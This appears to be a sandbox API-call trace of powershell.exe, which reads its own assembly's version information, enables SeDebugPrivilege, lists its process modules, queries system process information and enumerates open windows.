	[0454.805] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1adfa0 | out: lpdwHandle=0x1adfa0) returned 0x94c
	[0454.807] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cf72d8 | out: lpData=0x2cf72d8) returned 1
	[0454.809] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adf18, puLen=0x1adf10 | out: lplpBuffer=0x1adf18*=0x2cf7374, puLen=0x1adf10) returned 1
	[0454.812] lstrlenW (lpString="䅁") returned 1
	[0454.820] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ade88, puLen=0x1ade80 | out: lplpBuffer=0x1ade88*=0x2cf7450, puLen=0x1ade80) returned 1
	[0454.821] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0454.823] CoTaskMemAlloc (cb=0x2e) returned 0x442510
	[0454.823] lstrcpyW (in: lpString1=0x442510, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0454.824] CoTaskMemFree (pv=0x442510) 
	[0454.824] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ade88, puLen=0x1ade80 | out: lplpBuffer=0x1ade88*=0x2cf74a4, puLen=0x1ade80) returned 1
	[0454.824] lstrlenW (lpString="System.Management.Automation") returned 28
	[0454.824] CoTaskMemAlloc (cb=0x3c) returned 0x389860
	[0454.825] lstrcpyW (in: lpString1=0x389860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0454.825] CoTaskMemFree (pv=0x389860) 
	[0454.825] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ade88, puLen=0x1ade80 | out: lplpBuffer=0x1ade88*=0x2cf7500, puLen=0x1ade80) returned 1
	[0454.825] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0454.825] CoTaskMemAlloc (cb=0x20) returned 0x441020
	[0454.825] lstrcpyW (in: lpString1=0x441020, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0454.825] CoTaskMemFree (pv=0x441020) 
	[0454.825] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ade88, puLen=0x1ade80 | out: lplpBuffer=0x1ade88*=0x2cf7540, puLen=0x1ade80) returned 1
	[0454.825] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0454.825] CoTaskMemAlloc (cb=0x44) returned 0x389860
	[0454.825] lstrcpyW (in: lpString1=0x389860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0454.825] CoTaskMemFree (pv=0x389860) 
	[0454.825] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ade88, puLen=0x1ade80 | out: lplpBuffer=0x1ade88*=0x2cf75a8, puLen=0x1ade80) returned 1
	[0454.825] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0454.825] CoTaskMemAlloc (cb=0x76) returned 0x3ef2f0
	[0454.825] lstrcpyW (in: lpString1=0x3ef2f0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0454.825] CoTaskMemFree (pv=0x3ef2f0) 
	[0454.825] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ade88, puLen=0x1ade80 | out: lplpBuffer=0x1ade88*=0x2cf7644, puLen=0x1ade80) returned 1
	[0454.825] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0454.825] CoTaskMemAlloc (cb=0x44) returned 0x389860
	[0454.825] lstrcpyW (in: lpString1=0x389860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0454.825] CoTaskMemFree (pv=0x389860) 
	[0454.825] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ade88, puLen=0x1ade80 | out: lplpBuffer=0x1ade88*=0x2cf76a8, puLen=0x1ade80) returned 1
	[0454.825] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0454.825] CoTaskMemAlloc (cb=0x58) returned 0x3a64f0
	[0454.825] lstrcpyW (in: lpString1=0x3a64f0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0454.825] CoTaskMemFree (pv=0x3a64f0) 
	[0454.825] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ade88, puLen=0x1ade80 | out: lplpBuffer=0x1ade88*=0x2cf7724, puLen=0x1ade80) returned 1
	[0454.826] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0454.826] CoTaskMemAlloc (cb=0x20) returned 0x441020
	[0454.826] lstrcpyW (in: lpString1=0x441020, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0454.826] CoTaskMemFree (pv=0x441020) 
	[0454.826] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ade88, puLen=0x1ade80 | out: lplpBuffer=0x1ade88*=0x2cf73cc, puLen=0x1ade80) returned 1
	[0454.826] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0454.826] CoTaskMemAlloc (cb=0x66) returned 0x3cb9a0
	[0454.826] lstrcpyW (in: lpString1=0x3cb9a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0454.826] CoTaskMemFree (pv=0x3cb9a0) 
	[0454.826] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ade88, puLen=0x1ade80 | out: lplpBuffer=0x1ade88*=0x0, puLen=0x1ade80) returned 0
	[0454.826] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ade88, puLen=0x1ade80 | out: lplpBuffer=0x1ade88*=0x0, puLen=0x1ade80) returned 0
	[0454.826] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ade88, puLen=0x1ade80 | out: lplpBuffer=0x1ade88*=0x0, puLen=0x1ade80) returned 0
	[0454.826] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ade58, puLen=0x1ade50 | out: lplpBuffer=0x1ade58*=0x2cf7374, puLen=0x1ade50) returned 1
	[0454.827] CoTaskMemAlloc (cb=0x204) returned 0x3f1d00
	[0454.827] VerLanguageNameW (in: wLang=0x0, szLang=0x3f1d00, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0454.828] CoTaskMemFree (pv=0x3f1d00) 
	[0454.829] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\", lplpBuffer=0x1adea8, puLen=0x1adea0 | out: lplpBuffer=0x1adea8*=0x2cf7300, puLen=0x1adea0) returned 1
	[0454.834] GetCurrentProcessId () returned 0x54c
	[0455.253] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1acdd0 | out: lpLuid=0x1acdd0*(LowPart=0x14, HighPart=0)) returned 1
	[0455.256] GetCurrentProcess () returned 0xffffffffffffffff
	[0455.257] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1acdf0 | out: TokenHandle=0x1acdf0*=0x2e0) returned 1
	[0455.258] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x2cfab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0455.259] CloseHandle (hObject=0x2e0) returned 1
	[0455.263] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x54c) returned 0x2e0
	[0455.271] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x2cfabb8, cb=0x200, lpcbNeeded=0x1ade08 | out: lphModule=0x2cfabb8, lpcbNeeded=0x1ade08) returned 1
	[0455.668] GetModuleInformation (in: hProcess=0x2e0, hModule=0x13f370000, lpmodinfo=0x2cfae28, cb=0x18 | out: lpmodinfo=0x2cfae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0455.669] CoTaskMemAlloc (cb=0x804) returned 0x44a390
	[0455.669] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x13f370000, lpBaseName=0x44a390, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0455.669] CoTaskMemFree (pv=0x44a390) 
	[0455.670] CoTaskMemAlloc (cb=0x804) returned 0x44a390
	[0455.670] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x13f370000, lpFilename=0x44a390, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0455.670] CoTaskMemFree (pv=0x44a390) 
	[0455.671] CloseHandle (hObject=0x2e0) returned 1
	[0455.677] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x54c) returned 0x2e0
	[0455.678] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x1adf38 | out: lpExitCode=0x1adf38*=0x103) returned 1
	[0455.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cfb088, Length=0x20000, ResultLength=0x1adf00 | out: SystemInformation=0x12cfb088, ResultLength=0x1adf00*=0x2b4d0) returned 0xc0000004
	[0455.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d1b0b8, Length=0x2dcd0, ResultLength=0x1adf00 | out: SystemInformation=0x12d1b0b8, ResultLength=0x1adf00*=0x2b4d0) returned 0x0
	[0455.698] EnumWindows (lpEnumFunc=0x2c766ac, lParam=0x0) returned 1
	[0457.396] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0457.396] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x558
	[0457.396] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0457.396] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0457.396] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0457.396] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x538
	[0457.396] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0457.397] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x778
	[0457.397] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x778
	[0457.397] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0457.397] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0457.397] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0457.397] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0457.397] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0457.409] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0457.410] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0457.410] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0457.410] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x460
	[0457.410] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0457.410] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0457.410] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1554
	[0457.411] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1674
	[0457.411] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1520
	[0457.411] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x14bc
	[0457.411] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xf8c
	[0457.411] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xe9c
	[0457.411] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1434
	[0457.411] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x14ec
	[0457.412] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xfcc
	[0457.412] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x12ac
	[0457.412] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1484
	[0457.412] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x934
	[0457.412] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xc0c
	[0457.412] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xb08
	[0457.412] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x948
	[0457.413] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1178
	[0457.413] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x13e0
	[0457.413] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xcd0
	[0457.413] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x13fc
	[0457.413] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xdc8
	[0457.413] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xc18
	[0457.413] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xc2c
	[0457.414] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xa1c
	[0457.414] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1244
	[0457.414] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xdb0
	[0457.414] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1398
	[0457.414] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1358
	[0457.414] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1370
	[0457.414] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1340
	[0457.415] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x130c
	[0457.415] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x12c0
	[0457.415] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x12e4
	[0457.415] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1270
	[0457.415] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1298
	[0457.415] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x120c
	[0457.415] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x122c
	[0457.416] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x11c4
	[0457.416] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x11b0
	[0457.416] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1188
	[0457.416] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1148
	[0457.416] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1160
	[0457.416] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x10fc
	[0457.416] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xe34
	[0457.417] GetWindow (hWnd=0x104bc, uCmd=0x4) returned 0x0
	[0457.418] IsWindowVisible (hWnd=0x104bc) returned 0
	[0457.418] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xea4
	[0457.419] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x514
	[0457.419] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xe48
	[0457.419] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xbc8
	[0457.419] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xdf8
	[0457.419] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x318
	[0457.419] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xcac
	[0457.419] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x8bc
	[0457.420] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xf9c
	[0457.420] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xf48
	[0457.420] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xe40
	[0457.420] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xecc
	[0457.420] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xeb8
	[0457.420] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xe80
	[0457.420] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xe98
	[0457.420] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xe60
	[0457.421] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xee4
	[0457.421] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xf00
	[0457.421] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xdf0
	[0457.421] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xe1c
	[0457.421] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xdd0
	[0457.421] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xd94
	[0457.421] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xd74
	[0457.421] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xd00
	[0457.422] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xcd8
	[0457.422] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xc84
	[0457.422] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xca4
	[0457.422] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xc64
	[0457.422] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xc24
	[0457.422] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xb84
	[0457.422] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xbac
	[0457.422] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x384
	[0457.423] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xab8
	[0457.423] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x33c
	[0457.423] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xa44
	[0457.423] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xa64
	[0457.423] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x8a8
	[0457.423] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xaf0
	[0457.423] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x88c
	[0457.423] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xb04
	[0457.424] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x910
	[0457.424] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x230
	[0457.424] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xac0
	[0457.424] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xab4
	[0457.424] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xaac
	[0457.424] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x3d0
	[0457.424] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x978
	[0457.424] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xa7c
	[0457.424] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x59c
	[0457.424] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xa88
	[0457.425] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xa6c
	[0457.425] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xa68
	[0457.425] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x9f8
	[0457.425] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xa04
	[0457.425] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x924
	[0457.425] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x8dc
	[0457.425] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x7dc
	[0457.425] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x768
